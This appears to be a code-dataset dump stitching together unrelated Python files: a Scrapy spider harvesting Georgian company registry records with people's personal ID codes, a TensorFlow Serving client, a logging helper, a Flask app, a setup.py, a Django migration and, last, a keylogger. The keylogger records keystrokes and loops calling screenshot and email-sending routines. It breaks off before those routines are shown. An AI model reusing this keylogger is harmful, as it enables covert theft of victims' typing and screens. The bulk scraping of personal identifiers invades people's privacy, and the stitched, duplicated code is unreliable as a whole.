#log.msg("Found dbid: {}".format(dbid))
corp_url = self.base_url+u"?c=app&m=show_legal_person&legal_code_id={}".format(dbid)
request = Request(url=corp_url,callback=self.parse_corpdetails)
request.meta['id_code_reestri_db'] = dbid
request.meta['cookiejar'] = response.meta['cookiejar']
results.append(request)
# We also need to click the "Next" button
#next_btn = soup.find_all("img",src="https://enreg.reestri.gov.ge/images/next.png")
#if len(next_btn) > 0: # Found it.
# page_num = next_btn[0].parent['onclick'].replace(u'legal_person_paginate',u'').strip(u"()")
# form_data ={'c': 'search',
# 'm': 'find_legal_persons',
# 'p': page_num,}
# request = FormRequest(self.base_url,
# dont_filter=True,
# formdata=form_data,
# callback=self.parse_corptable,
# meta={'cookiejar': response.meta['cookiejar'],
# 'page': int(page_num),
# 'total': response.meta['total'],
# 'type': response.meta['cookiejar'],
# })
# results.append(request)
# If there's no Next button
if response.meta['page'] < response.meta['total'] and len(results) == 0:
log.msg("No results found on page {}/{} of type {}, renewing cookies".format(response.meta['page'],response.meta['total'],response.meta['type']))
request = Request(self.base_url,
callback=self.setup_cookies,
dont_filter=True,
meta={'cookiejar': response.meta['cookiejar'],
'renew': True,
'page': response.meta['page'],
'total': response.meta['total'],
'type': response.meta['cookiejar'],
})
results.append(request)
return results
    # Here we finally get to actually scrape something
    def parse_corpdetails(self, response):
        """Scrape one corporation detail page.

        Returns a list containing: a Corporation item; a Person item when
        the entity is an individual entrepreneur with a personal code;
        CorporationDocument items for each scanned document; Requests for
        the corporation's statement pages; and Requests for documents we
        might be able to parse (PDFs only).
        """
        def get_table_row(soup, header):
            # Return the stripped text of the <td> following the <td>
            # whose text equals `header`; returns None (implicitly) when
            # the header cell is absent, or None when the value is empty.
            res = soup.find("td",text=header)
            if res is not None:
                text = res.find_next_sibling("td").string
                if text is not None:
                    text = text.strip()
                return text
        #log.msg("Parsing corp details page")
        soup = BeautifulSoup(response.body, "html5lib", from_encoding="utf-8")
        results = [] # Results to be returned by this callback
        # Create 1 corporation.  The u"..." headers below are the
        # Georgian row labels on the detail page (identification code,
        # personal number, state registration number, name, legal form,
        # state registration date, in that order).
        corp = Corporation()
        corp['id_code_legal'] = get_table_row(soup,u"საიდენტიფიკაციო კოდი")
        corp['personal_code'] = get_table_row(soup,u"პირადი ნომერი")
        corp['state_reg_code'] = get_table_row(soup,u"სახელმწიფო რეგისტრაციის ნომერი")
        corp['name'] = get_table_row(soup,u"დასახელება")
        corp['classification'] = get_table_row(soup,u"სამართლებრივი ფორმა")
        corp['registration_date'] = get_table_row(soup,u"სახელმწიფო რეგისტრაციის თარიღი")
        corp['id_code_reestri_db'] = response.meta['id_code_reestri_db']
        # The status cell has some cruft in it, so the easy method doesn't work
        corp['status'] = soup.find("td", text=u"სტატუსი").find_next_sibling("td").div.string
        if (corp['status'] is not None):
            corp['status'] = corp['status'].strip()
        corp['no_docs'] = True
        #results.append(corp)
        # Return 1 person if necessary: "ინდივიდუალური მეწარმე" is the
        # Individual Entrepreneur legal form, where the corporation IS a
        # person.
        if ((corp['classification'] == u"ინდივიდუალური მეწარმე") and (corp['personal_code'] is not None)):
            pers = Person()
            pers['name'] = corp['name']
            pers['personal_code'] = corp['personal_code']
            results.append(pers)
        # Return Requests / Items for statements ("განცხადებები") and
        # scanned documents ("სკანირებული დოკუმენტები").
        stmnt_caption = soup.find("caption", text=u"განცხადებები")
        scand_caption = soup.find("caption", text=u"სკანირებული დოკუმენტები")
        # Return requests for statement pages
        if stmnt_caption is not None:
            corp['no_docs'] = False
            stmnt_table = stmnt_caption.parent
            for row in stmnt_table.tbody.find_all("tr"):
                # Statement db id is in the onclick() of the <a> wrapping
                # the blob icon, as in parse_corptable.
                link = row.find_all("img", src="https://enreg.reestri.gov.ge/images/blob.png")[0].parent
                stmnt_dbid = link['onclick'].split(u"(")[-1].rstrip(u")")
                my_url = self.base_url+u"?c=app&m=show_app&app_id={}".format(stmnt_dbid)
                results.append(Request(url=my_url,
                                       callback=self.parse_statement,
                                       meta={'cookiejar':response.meta['cookiejar'],
                                             'corp_id_code':corp['id_code_legal'],
                                             'stmnt_id_reestri_db':stmnt_dbid}))
        if scand_caption is not None:
            corp['no_docs'] = False
            scand_table = scand_caption.parent
            for row in scand_table.tbody.find_all("tr"):
                link_node = row.find_all("img", src="https://enreg.reestri.gov.ge/images/blob.png")[0].parent
                doc_url = link_node['href']
                # Get the file name.
                # It's the text of the second column.
                # But there's an empty <strong> tag there so we
                # can't use BeautifulSoup's convenience .string attribute
                #log.msg("Link node next element {}".format(link_node.parent.next_element))
                fname = link_node.parent.find_next_sibling("td").find("a").string
                # Create a CorporationDocument
                doc = CorporationDocument(fk_corp_id_code=corp['id_code_legal'],filename=fname,link=doc_url)
                results.append(doc)
                # Create a request if we might be able to parse it (pdf only)
                if fname[-3:] == "pdf":
                    results.append(Request(url=doc_url,
                                           callback=self.parse_corp_pdf,
                                           meta={'cookiejar':response.meta['cookiejar']}))
        results.append(corp)
        return results
# Parse a corporation statement page.
# This has lots of details about the corporation and links to
# other stuff.
def parse_statement(self, response):
from scrapy.shell import inspect_response
results = []
app_id_code_reestri_db = urlparse.parse_qs(urlparse.urlparse(response.request.url)[4])['app_id'][0]
soup = BeautifulSoup(response.body, "html5lib", from_encoding="utf-8")
# First table: "Prepared documents" -- scrape details into CorpDoc item
# and then grab the doc too; they are usually PDFs.
prepared_table = soup.find("caption", text=u"მომზადებული დოკუმენტები")
if prepared_table is not None:
prepared_table = prepared_table.parent
for row in prepared_table.find_all("tr"):
# First cell contains link
# Second contains title, date
# Third is blank
cells = row.find_all("td")
link = cells[0].a["href"]
spans = cells[1].find_all("span")
title = spans[0].string
date = spans[1].string
results.append(StatementDocument(
fk_corp_id_code=response.meta['corp_id_code'],
fk_stmnt_id_code_reestri_db=app_id_code_reestri_db,
link=link,
title=title,
date=date))
results.append(Request(url=link,
callback=self.parse_stmnt_prepared_doc,
meta={'cookiejar':response.meta['cookiejar'],
'corp_id_code':response.meta['corp_id_code']}))
# Second table: Status Documents. Scrape details into CorpDocs, and
# grab the docs too, they are usually PDFs.
status_table = soup.find("caption", text=u"სტატუსი / გადაწყვეტილება")
if status_table is not None:
status_table = status_table.parent
for row in status_table.find_all("tr"):
cells = row.find_all("td")
link = cells[0].a["href"]
registration_num = cells[1].find(class_="maintxt").string
date = cells[1].find(class_="smalltxt").string
title = cells[2].find(style=True).string
results.append(StatementDocument(
fk_corp_id_code=response.meta['corp_id_code'],
fk_stmnt_id_code_reestri_db=app_id_code_reestri_db,
link=link,
title=title,
date=date,
registration_num=registration_num))
# Probably don't actually need to parse these.
#results.append(Request(url=link,
# callback=self.parse_stmnt_status_pdf,
# meta={'cookiejar':response.meta['cookiejar'],
# 'id_code_reestri_db':response.meta['id_code_reestri_db']}))
# Third table: Scanned Documents. Scrape details into CorpDocs, and
# grab the docs if they are PDFs.
scanned_table = soup.find("caption", text=u"სკანირებული დოკუმენტები")
if scanned_table is not None:
scanned_table = scanned_table.parent
for row in scanned_table.find_all("tr"):
cells = row.find_all("td")
link = cells[0].a["href"]
doc_info = cells[1].find_all(class_="maintxt")
if (len(doc_info) == 2):
title = doc_info[0].string
date = doc_info[1].string
else:
date = doc_info[0].string
title = None
filename = cells[2].find("a").find("span").string
doc = StatementDocument(
fk_corp_id_code=response.meta['corp_id_code'],
fk_stmnt_id_code_reestri_db=app_id_code_reestri_db,
link=link,
date=date,
filename=filename)
if (title):
doc['title'] = title
results.append(doc)
#TODO: Check whether it's a PDF and if so, return
# a Request to the document.
# Fourth table: Statement details. Scrape details into RegistryStatement.
statement = RegistryStatement()
# First block of info, starting with statement number.
regx = re.compile(u"^\s+განცხადება.+$")
caption = soup.find("caption",text=regx)
if caption is None:
inspect_response(response)
statement['statement_num'] = caption.string.split('#')[1]
table = caption.parent
statement['registration_num'] = self._get_header_sib(table,u"\n\s*რეგისტრაციის ნომერი\s*").span.string
statement['statement_type'] = self._get_header_sib(table,u"\n\s*მომსახურების სახე\s*").span.string
statement['service_cost'] = self._get_header_sib(table,u"\n\s*მომსახურების ღირებულება\s*").span.string
pay_debt = self._get_header_sib(table,u"\n\s*გადასახდელი თანხა/ბალანსი\s*").span.string
statement['payment'] = pay_debt.split("/")[0]
statement['outstanding'] = pay_debt.split("/")[1]
statement['id_reestri_db'] = response.meta['stmnt_id_reestri_db']
# Second block of info, starting after payment details.
# Find the correct table
table = soup.find("div", id="application_tab").table
# Grab the relevant parts
statement['id_code_legal'] = self._get_header_sib(table,u"საიდენტიფიკაციო ნომერი").strong.string
statement['name'] = self._get_header_sib(table,u"სუბიექტის დასახელება ").string
statement['classification'] = self._get_header_sib(table,u"სამართლებრივი ფორმა").string
statement['reorganization_type'] = self._get_header_sib(table,u"რეორგანიზაციის ტიპი ").string
statement['quantity'] = self._get_header_sib(table,u"რაოდენობა").string
statement['changed_info'] = self._get_header_sib(table,u"შესაცვლელი რეკვიზიტი: ").string
# Attached docs description is a <ul>
attached = self._get_header_sib(table, u"\n\s*თანდართული დოკუმენტაცია\s")
attached_desc = []
for li in attached.ul.contents:
attached_desc.append(li.string)
statement['attached_docs_desc'] = attached_desc
# Additional docs is a <div>, don't know what the format looks like yet
addtl_td = self._get_header_sib(table,u"\n\s*დამატებით წარმოდგენილი\s*")
statement['additional_docs'] = addtl_td.find(id="additional_docs_container").string
# Issued docs also a ul
issued = self._get_header_sib(table, u"\n\s*გასაცემი დოკუმენტები\s*").ul
issued_desc = []
for li in issued.contents:
issued_desc.append(li.string)
statement['issued_docs'] = issued_desc
# Don't know the format of notes yet either.
notes_td = self._get_header_sib(table, u"\n\s*შენიშვნა\s*")
statement['notes'] = notes_td.string
results.append(statement)
# Cells containing people require a bit more intelligence
representative_td = self._get_header_sib(table,u" წარმომადგენელი ")
rv_pers = self._person_from_statement_cell(representative_td)
if len(rv_pers) > 0:
results.append(PersonCorpRelation(person=rv_pers,
fk_corp_id_code = response.meta['corp_id_code'],
relation_type = [u"წარმომადგენელი"],
cite_type = "statement",
cite_link = response.request.url))
representee_td = self._get_header_sib(table,u" წარმომდგენი ")
re_pers = self._person_from_statement_cell(representee_td)
if len(re_pers) > 0:
results.append(PersonCorpRelation(person=re_pers,
fk_corp_id_code = response.meta['corp_id_code'],
relation_type = [u"წარმომდგენი"],
cite_type = "statement",
cite_link = response.request.url))
ganmcxadebeli_td = self._get_header_sib(table,u"განმცხადებელი ")
g_pers = self._person_from_statement_cell(ganmcxadebeli_td)
if len(g_pers) > 0:
results.append(PersonCorpRelation(person=g_pers,
fk_corp_id_code = response.meta['corp_id_code'],
relation_type = [u"განმცხადებელი"],
cite_type = "statement",
cite_link = response.request.url))
return results
    def parse_corp_pdf(self, response):
        """Callback for company PDF responses; currently an unimplemented no-op stub."""
        pass
# Each statement may have an output document which is "prepared"
# for that statement. This function scrapes those documents
    def parse_stmnt_prepared_doc(self, response):
        """Scrape a statement's "prepared" output document (a PDF).

        Delegates to _info_from_pdf, passing along the company ID code that
        the requesting code stashed in response.meta['corp_id_code'].
        """
        return self._info_from_pdf(response.body,response.url, response.meta['corp_id_code'])
def _info_from_pdf(self,text,url,corp_id_code):
from scrapy.shell import inspect_response
# These documents are PDFs, so they're going to be coming
# from the PdfToHtml Middleware, which means they'll
# be XML rather than HTML.
log.msg("Parsing PDF {}".format(url), level=log.DEBUG)
headers = pdfparse.headers
results = []
soup = BeautifulSoup(text, "xml", from_encoding="utf-8")
boxes = pdfparse.boxes_from_xml(text)
boxes = pdfparse.check_box_values(boxes)
# The following condition is to check whether we're dealing with an English or a Georgian docuument.
englishHeader = soup.find("text",text="Entity")
isEnglishDocument = False
if englishHeader:
isEnglishDocument = True
georgianEntityTitle = u"სუბიექტი"
isGeorgianDocToParse = soup.find("text",text=georgianEntityTitle)
if (isGeorgianDocToParse or isEnglishDocument):
#boxes = pdfparse.remove_duplicates(boxes) # Handily, this sorts too
# TextBoxes define sort order as top-to-bottom, left-to-right.
# TODO: Check for malformed / Blank / Something else extracts
extract = RegistryExtract()
extract['fk_corp_id_code'] = corp_id_code
extract['corp_url'] = url
# Get extract date.
date_lines = pdfparse.get_pdf_lines('extract_date',boxes,soup,isEnglishDocument,False)
if date_lines is not None:
extract['date'] = u"".join([tb for tb in date_lines])
# Get mailing address
address_lines = pdfparse.get_pdf_lines('address',boxes,soup,isEnglishDocument,False)
if address_lines is not None:
s = u"".join([tb for tb in address_lines])
log.msg("Found address, printing: ", level=log.DEBUG)
# TODO: Metrics to check whether we've mis-parsed.
extract['corp_address'] = s
log.msg(unicode(s),level=log.DEBUG)
else:
address_lines = pdfparse.get_pdf_lines('address',boxes,soup,isEnglishDocument,True)
if address_lines is not None:
s = u"".join([tb for tb in address_lines])
log.msg("Found address on 2nd try, printing: ", level=log.DEBUG)
# TODO: Metrics to check whether we've mis-parsed.
extract['corp_address'] = s
log.msg(unicode(s),level=log.DEBUG)
else:
log.msg("No address found.", level=log.DEBUG)
# Get legal form
legalform_lines = pdfparse.get_pdf_lines('legal_form',boxes,soup,isEnglishDocument,False)
if legalform_lines is not None:
log.msg("Found legal form, printing: ", level=log.DEBUG)
s = u"".join([tb for tb in legalform_lines])
# TODO: Metrics to check whether we've mis-parsed.
extract['corp_legalform'] = s
log.msg(unicode(s),level=log.DEBUG)
else:
legalform_lines = pdfparse.get_pdf_lines('legal_form',boxes,soup,isEnglishDocument,True)
if legalform_lines is not None:
log.msg("Found legal form on 2nd try, printing: ", level=log.DEBUG)
s = u"".join([tb for tb in legalform_lines])
# TODO: Metrics to check whether we've mis-parsed.
extract['corp_legalform'] = s
log.msg(unicode(s),level=log.DEBUG)
else:
log.msg("No legal form found.", level=log.DEBUG)
# Get email address
email_lines = pdfparse.get_pdf_lines('email',boxes,soup,isEnglishDocument,False)
if email_lines is not None:
log.msg("Found email, printing: ", level=log.DEBUG)
s = u"".join([tb for tb in email_lines])
log.msg(unicode(s), level=log.DEBUG)
# TODO: Validate email address to check for mis-parse
extract['corp_email'] = s
else:
log.msg("No email found.", level=log.DEBUG)
results.append(extract)
# Parse directors
dir_lines = pdfparse.get_pdf_lines('directors',boxes,soup,isEnglishDocument,False)
if(dir_lines is not None):
log.msg("Found directors block, printing", level=log.DEBUG)
text = [tb for tb in dir_lines]
board = pdfparse.parse_directors(text)
for mem in board:
try:
pers = Person(personal_code=mem["id_code"])
except (KeyError, IndexError):
continue
try:
pers["name"] = mem["name"]
except KeyError:
pass
try:
pers["nationality"] = mem["nationality"]
except KeyError:
pass
relation = PersonCorpRelation(person=pers,
fk_corp_id_code=corp_id_code,
cite_type=u"extract",
cite_link=url)
try:
relation["relation_type"] = [mem["position"]]
except KeyError:
pass
log.msg("Added relation from Extract: {}".format(relation), level=log.DEBUG)
results.append(relation)
#s = u"".join([tb.text for tb in dir_lines])
#log.msg(unicode(s), level=log.DEBUG)
else:
log.msg("No directors found.", level=log.DEBUG)
# Extract ownership info
own_lines = pdfparse.get_pdf_lines('partners',boxes,soup,isEnglishDocument,False)
if(own_lines is not None):
log.msg("Found partners block, printing", level=log.DEBUG)
text = [tb for tb in own_lines]
owners = pdfparse.parse_owners(text)
for o in owners:
try:
pers = Person(personal_code=o["id_code"])
except KeyError:
continue
try:
pers["name"] = o["name"]
except KeyError:
pass
try:
pers["nationality"] = o["nationality"]
except KeyError:
pass
relation = PersonCorpRelation(person=pers,
fk_corp_id_code=corp_id_code,
cite_type=u"extract",
cite_link=url)
relation["relation_type"] = [u"პარტნიორი"]
try:
relation["share"] = o["share"]
except KeyError:
pass
log.msg("Added relation from Extract: {}".format(relation), level=log.DEBUG)
results.append(relation)
else:
log.msg("No owners found.", level=log.DEBUG)
return results
# Each statement also has status docs which come along with it
# This function extracts information from those docs.
# It appears these docs are duplicative so they probably don't
# need to be scraped.
#def parse_stmnt_status_pdf(self, response):
# pass
# There are a lot of tables where the header
# is in column 0, and the info we want is in column 1.
# So this just searches for a td matching the header
# string and then returns its next sibling.
def _get_header_sib(self, soup, header):
regx = re.compile(header)
res = soup.find("td",text=regx)
if res is not None:
next_col = res.find_next_sibling("td")
return next_col
def _person_from_statement_cell(self, cell):
pers = Person()
for s in cell.stripped_strings:
parts = s.split(u"(პ/ნ:")
if len(parts) == 2:
pers['name'] = parts[0]
pers['personal_code'] = parts[1][:-1]
else:
pers['address'] = s
return pers
    def parse(self, response):
        """Default Scrapy response callback; intentionally empty here (presumably
        every request in this spider sets an explicit callback — verify)."""
        pass
| 30,325 | 2,119 | 23 |
09acc4605fd5b38508b61e04b86a6d3de0f7cc15 | 1,474 | py | Python | docs/client.py | kmader/MMdnn | f62a33a7d6834680537693c7fdc7e90e1b2382ef | [
"MIT"
] | 3,442 | 2017-11-20T08:39:51.000Z | 2019-05-06T10:51:19.000Z | docs/client.py | kmader/MMdnn | f62a33a7d6834680537693c7fdc7e90e1b2382ef | [
"MIT"
] | 430 | 2017-11-29T04:21:48.000Z | 2019-05-06T05:37:37.000Z | docs/client.py | kmader/MMdnn | f62a33a7d6834680537693c7fdc7e90e1b2382ef | [
"MIT"
] | 683 | 2017-11-20T08:50:34.000Z | 2019-05-04T04:25:14.000Z | '''
Send JPEG image to tensorflow_model_server loaded with GAN model.
Hint: the code has been compiled together with TensorFlow serving
and not locally. The client is called in the TensorFlow Docker container
'''
from __future__ import print_function
# Communication to TensorFlow server via gRPC
from grpc.beta import implementations
import tensorflow as tf
# TensorFlow serving stuff to send messages
from tensorflow_serving.apis import predict_pb2
from tensorflow_serving.apis import prediction_service_pb2
# Command line arguments
tf.app.flags.DEFINE_string('server', 'localhost:9000',
                           'PredictionService host:port')
tf.app.flags.DEFINE_string('image', '', 'path to image in JPEG format')
FLAGS = tf.app.flags.FLAGS


def main(_):
    """Send the JPEG named by --image to the prediction service and print the reply.

    tf.app.run() parses the command-line flags and then invokes this
    function with the leftover argv (ignored). Without a module-level
    main(), tf.app.run() below would fail with a NameError.
    """
    host, port = FLAGS.server.split(':')
    channel = implementations.insecure_channel(host, int(port))
    stub = prediction_service_pb2.beta_create_PredictionService_stub(channel)
    # Send request: the raw JPEG bytes go into the 'image' input tensor.
    image = tf.gfile.FastGFile(FLAGS.image, 'rb').read()
    request = predict_pb2.PredictRequest()
    request.model_spec.name = 'tensorflow-serving'
    request.model_spec.signature_name = tf.saved_model.signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY
    request.inputs['image'].CopyFrom(tf.contrib.util.make_tensor_proto(image))
    result = stub.Predict(request, 10.0)  # 10 secs timeout
    print(result)


if __name__ == '__main__':
    tf.app.run()
| 33.5 | 108 | 0.755088 | '''
Send JPEG image to tensorflow_model_server loaded with GAN model.
Hint: the code has been compiled together with TensorFlow serving
and not locally. The client is called in the TensorFlow Docker container
'''
from __future__ import print_function
# Communication to TensorFlow server via gRPC
from grpc.beta import implementations
import tensorflow as tf
# TensorFlow serving stuff to send messages
from tensorflow_serving.apis import predict_pb2
from tensorflow_serving.apis import prediction_service_pb2
# Command line arguments
tf.app.flags.DEFINE_string('server', 'localhost:9000',
'PredictionService host:port')
tf.app.flags.DEFINE_string('image', '', 'path to image in JPEG format')
FLAGS = tf.app.flags.FLAGS
def main(_):
host, port = FLAGS.server.split(':')
channel = implementations.insecure_channel(host, int(port))
stub = prediction_service_pb2.beta_create_PredictionService_stub(channel)
# Send request
image = tf.gfile.FastGFile(FLAGS.image, 'rb').read()
request = predict_pb2.PredictRequest()
request.model_spec.name = 'tensorflow-serving'
request.model_spec.signature_name = tf.saved_model.signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY
request.inputs['image'].CopyFrom(tf.contrib.util.make_tensor_proto(image))
#request.inputs['input'].CopyFrom()
result = stub.Predict(request, 10.0) # 10 secs timeout
print(result)
if __name__ == '__main__':
tf.app.run()
| 651 | 0 | 23 |
57a796c67682624626cfd8021fec8667928490a1 | 1,863 | py | Python | setup_logging.py | mnooel/BUSADM_795_UtilizationPrediction | 65b7b5f7902133fdf93ffa0c15362c7c5cf20196 | [
"MIT"
] | null | null | null | setup_logging.py | mnooel/BUSADM_795_UtilizationPrediction | 65b7b5f7902133fdf93ffa0c15362c7c5cf20196 | [
"MIT"
] | null | null | null | setup_logging.py | mnooel/BUSADM_795_UtilizationPrediction | 65b7b5f7902133fdf93ffa0c15362c7c5cf20196 | [
"MIT"
] | null | null | null | # setup_logging.py
import logging
import logging.config
from settings import LOGS_DIR
class CustomFormatter(logging.Formatter):
    """Logging Formatter that wraps each record in an ANSI color per level."""
    pink = "\x1b[35m"
    blue = "\033[96m"
    yellow = "\033[93m"
    red = "\x1b[31;21m"
    bold_red = "\033[41m"
    reset = "\x1b[0m"
    # Base layout string. Note: this class attribute is shadowed by the
    # format() method once the class body finishes executing; FORMATS is
    # built from the string while the body is still running.
    format = "%(asctime)s | %(name)s | %(levelname)s | %(message)s"
    FORMATS = {
        logging.DEBUG: pink + format + reset,
        logging.INFO: blue + format + reset,
        logging.WARNING: yellow + format + reset,
        logging.ERROR: red + format + reset,
        logging.CRITICAL: bold_red + format + reset
    }

    def format(self, record):
        """Format *record* using the color-wrapped layout mapped to its level.

        Without this override the FORMATS table was dead code and records
        were emitted uncolored via the base Formatter.
        """
        log_format = self.FORMATS.get(record.levelno)
        formatter = logging.Formatter(log_format)
        return formatter.format(record)
def setup_logger(logger: logging.Logger, log_file_name: str) -> None:
    """Attach the standard console and file handlers to *logger*.

    :param logger: logger object initiated at the beginning of the file
    :param log_file_name: file name to save the log under inside LOGS_DIR
    :return: None; the logger is modified in place
    """
    logger.setLevel(logging.DEBUG)

    # Console shows everything, with per-level colors.
    stream_handler = logging.StreamHandler()
    stream_handler.setLevel(level=logging.DEBUG)
    stream_handler.setFormatter(CustomFormatter())
    logger.addHandler(stream_handler)

    # The log file keeps INFO and above, uncolored.
    file_handler = logging.FileHandler(LOGS_DIR + '/' + log_file_name)
    file_handler.setLevel(level=logging.INFO)
    file_handler.setFormatter(
        logging.Formatter('%(asctime)s | %(name)s | %(levelname)s | %(message)s'))
    logger.addHandler(file_handler)
| 30.540984 | 91 | 0.677939 | # setup_logging.py
import logging
import logging.config
from settings import LOGS_DIR
class CustomFormatter(logging.Formatter):
"""Logging Formatter to ad colors and count warnings / errors"""
pink = "\x1b[35m"
blue = "\033[96m"
yellow = "\033[93m"
red = "\x1b[31;21m"
bold_red = "\033[41m"
reset = "\x1b[0m"
format = "%(asctime)s | %(name)s | %(levelname)s | %(message)s"
FORMATS = {
logging.DEBUG: pink + format + reset,
logging.INFO: blue + format + reset,
logging.WARNING: yellow + format + reset,
logging.ERROR: red + format + reset,
logging.CRITICAL: bold_red + format + reset
}
def format(self, record: logging.LogRecord) -> str:
log_format = self.FORMATS.get(record.levelno)
formatter = logging.Formatter(log_format)
return formatter.format(record)
def setup_logger(logger: logging.Logger, log_file_name: str) -> None:
"""
function that setups a standard logger
:rtype: None
:param logger: logger object initiated at the beginning of the file
:param log_file_name: name to save the log as
:return: None only modifications are made to the logger object
"""
logger.setLevel(logging.DEBUG)
# create handlers
console_handler = logging.StreamHandler()
file_handler = logging.FileHandler(LOGS_DIR + '/' + log_file_name)
# set levels of the handlers
console_handler.setLevel(level=logging.DEBUG)
file_handler.setLevel(level=logging.INFO)
# create formats and set them to the handlers
file_format = logging.Formatter('%(asctime)s | %(name)s | %(levelname)s | %(message)s')
console_handler.setFormatter(CustomFormatter())
file_handler.setFormatter(file_format)
# add handlers to the logger
logger.addHandler(console_handler)
logger.addHandler(file_handler)
| 174 | 0 | 27 |
35d3af359c0efd1434ebe45e1cddcebf6507ca75 | 211 | py | Python | app.py | behrad-kzm/ClubHouseFollowers | b22c5cd2d53aa72506247726a86d4d027d267091 | [
"MIT"
] | 1 | 2021-05-07T13:07:47.000Z | 2021-05-07T13:07:47.000Z | app.py | behrad-kzm/ClubHouseFollowers | b22c5cd2d53aa72506247726a86d4d027d267091 | [
"MIT"
] | 2 | 2021-05-07T12:58:34.000Z | 2021-06-12T22:17:07.000Z | app.py | behrad-kzm/ClubHouseFollowers | b22c5cd2d53aa72506247726a86d4d027d267091 | [
"MIT"
] | 2 | 2021-04-22T08:20:28.000Z | 2022-01-11T01:13:29.000Z | from flask import Flask
from web.BaseRouter import BaseRouter
# Flask application instance; all routes come from BaseRouter blueprints.
app = Flask(__name__)
# Mount the routes at the site root.
base_url = '/'
router = BaseRouter(base_url)
# Register every blueprint known to the router on the app.
router.register_flask_blueprints(app)
# Run the Flask development server when executed directly.
if __name__ == '__main__':
    app.run()
| 17.583333 | 37 | 0.753555 | from flask import Flask
from web.BaseRouter import BaseRouter
app = Flask(__name__)
base_url = '/'
router = BaseRouter(base_url)
router.register_flask_blueprints(app)
if __name__ == '__main__':
app.run()
| 0 | 0 | 0 |
feb38174f1700808131d73f0b240b8072e5ef95a | 748 | py | Python | setup.py | gsoft-inc/github-secret-finder | 07e85fbc84773dfe9e921d2e7a3c0372cb936177 | [
"Apache-2.0"
] | 4 | 2019-10-22T20:03:41.000Z | 2020-11-18T18:00:56.000Z | setup.py | mlefebvre/github-secret-finder | 07e85fbc84773dfe9e921d2e7a3c0372cb936177 | [
"Apache-2.0"
] | null | null | null | setup.py | mlefebvre/github-secret-finder | 07e85fbc84773dfe9e921d2e7a3c0372cb936177 | [
"Apache-2.0"
] | 1 | 2021-03-30T16:28:57.000Z | 2021-03-30T16:28:57.000Z | from setuptools import setup, find_packages
# Package metadata / installer configuration for github-secret-finder.
setup(
    name='github_secret_finder',
    version='2.0.0',
    description='Script to monitor commits from Github users and organizations for secrets.',
    url='https://github.com/gsoft-inc/github-secret-finder',
    author='Mathieu Gascon-Lefebvre',
    author_email='mathieuglefebvre@gmail.com',
    license='Apache',
    # Sources live under src/ (the "src layout").
    packages=find_packages("src"),
    package_dir={"": "src"},
    # Ship the bundled data files alongside the code.
    include_package_data=True,
    package_data={'github_secret_finder': ['data/*']},
    install_requires=[
        'unidiff',
        'requests',
        'detect_secrets',
        'sqlitedict'
    ],
    # Installs the `github-secret-finder` console command.
    entry_points={
        'console_scripts': ['github-secret-finder = github_secret_finder.main:main'],
    },
)
| 29.92 | 93 | 0.663102 | from setuptools import setup, find_packages
setup(
name='github_secret_finder',
version='2.0.0',
description='Script to monitor commits from Github users and organizations for secrets.',
url='https://github.com/gsoft-inc/github-secret-finder',
author='Mathieu Gascon-Lefebvre',
author_email='mathieuglefebvre@gmail.com',
license='Apache',
packages=find_packages("src"),
package_dir={"": "src"},
include_package_data=True,
package_data={'github_secret_finder': ['data/*']},
install_requires=[
'unidiff',
'requests',
'detect_secrets',
'sqlitedict'
],
entry_points={
'console_scripts': ['github-secret-finder = github_secret_finder.main:main'],
},
)
| 0 | 0 | 0 |
308df90572ef430a57e853178c42a774fc34567b | 284 | py | Python | blog/migrations/0003_delete_postthum.py | jinseopim/kkp | 609c05358bb76d14ce6796f4273a7867a494ce14 | [
"MIT"
] | 1 | 2020-11-07T02:27:46.000Z | 2020-11-07T02:27:46.000Z | blog/migrations/0003_delete_postthum.py | jinseopim/kkp | 609c05358bb76d14ce6796f4273a7867a494ce14 | [
"MIT"
] | null | null | null | blog/migrations/0003_delete_postthum.py | jinseopim/kkp | 609c05358bb76d14ce6796f4273a7867a494ce14 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.2 on 2020-11-01 02:59
from django.db import migrations
| 16.705882 | 47 | 0.588028 | # Generated by Django 3.1.2 on 2020-11-01 02:59
from django.db import migrations
class Migration(migrations.Migration):
    """Remove the PostThum model from the blog app (reverses 0002_postthum)."""
    dependencies = [
        ('blog', '0002_postthum'),
    ]
    operations = [
        # Drops the model (and its table) introduced by 0002_postthum.
        migrations.DeleteModel(
            name='PostThum',
        ),
    ]
| 0 | 178 | 23 |
5a2275f8ed7adc271398e4f82c8f878f8d5aa6e7 | 3,728 | py | Python | Start.py | Glitchhy/Simple-Keylogger | 3682517e90ef651c1d54ee9d29fcf512e1655b97 | [
"MIT"
] | 9 | 2020-08-14T12:08:59.000Z | 2022-02-22T02:58:32.000Z | Start.py | Glitchhy/Simple-Keylogger | 3682517e90ef651c1d54ee9d29fcf512e1655b97 | [
"MIT"
] | 1 | 2019-12-29T07:06:50.000Z | 2019-12-29T08:59:51.000Z | Start.py | Glitchhy/Simple-Keylogger | 3682517e90ef651c1d54ee9d29fcf512e1655b97 | [
"MIT"
] | 3 | 2020-08-03T17:32:53.000Z | 2020-09-04T16:36:48.000Z | import pynput
from pynput.keyboard import Key, Listener
import pyautogui
import yagmail
import os.path
from datetime import datetime
import time
import sys
import os
from sys import platform as _platform
#Defining color values for later
G = '\033[32m' #Green
R = '\033[31m' # Red
C = '\033[36m' # Cyan
W = '\033[0m' # White
#Needs testing but it SHOULD work
if _platform == "linux" or _platform =="linux2" or _platform =="darwin":
os.system('clear')
elif _platform == "win32" or _platform == "win64":
os.system('cls')
count = 0
keys = []
try:
print(G + "I am alive..." + W)
#Special characters are included here.
with Listener(on_press=on_press, on_release=on_release) as listener:
#Call Methods, Repeats every 1 minute
while True:
time.sleep(100)
save_screenshot()
send_emal()
listener.join()
except KeyboardInterrupt:
print('\n' + R + "Program Killed X_X" + W)
| 31.327731 | 141 | 0.450644 | import pynput
from pynput.keyboard import Key, Listener
import pyautogui
import yagmail
import os.path
from datetime import datetime
import time
import sys
import os
from sys import platform as _platform
#Defining color values for later
G = '\033[32m' #Green
R = '\033[31m' # Red
C = '\033[36m' # Cyan
W = '\033[0m' # White
#Needs testing but it SHOULD work
if _platform == "linux" or _platform =="linux2" or _platform =="darwin":
os.system('clear')
elif _platform == "win32" or _platform == "win64":
os.system('cls')
count = 0
keys = []
try:
print(G + "I am alive..." + W)
    def on_press(key):
        """pynput callback: buffer each pressed key; flush to disk every 10 keys."""
        global keys, count
        keys.append(key)
        count += 1
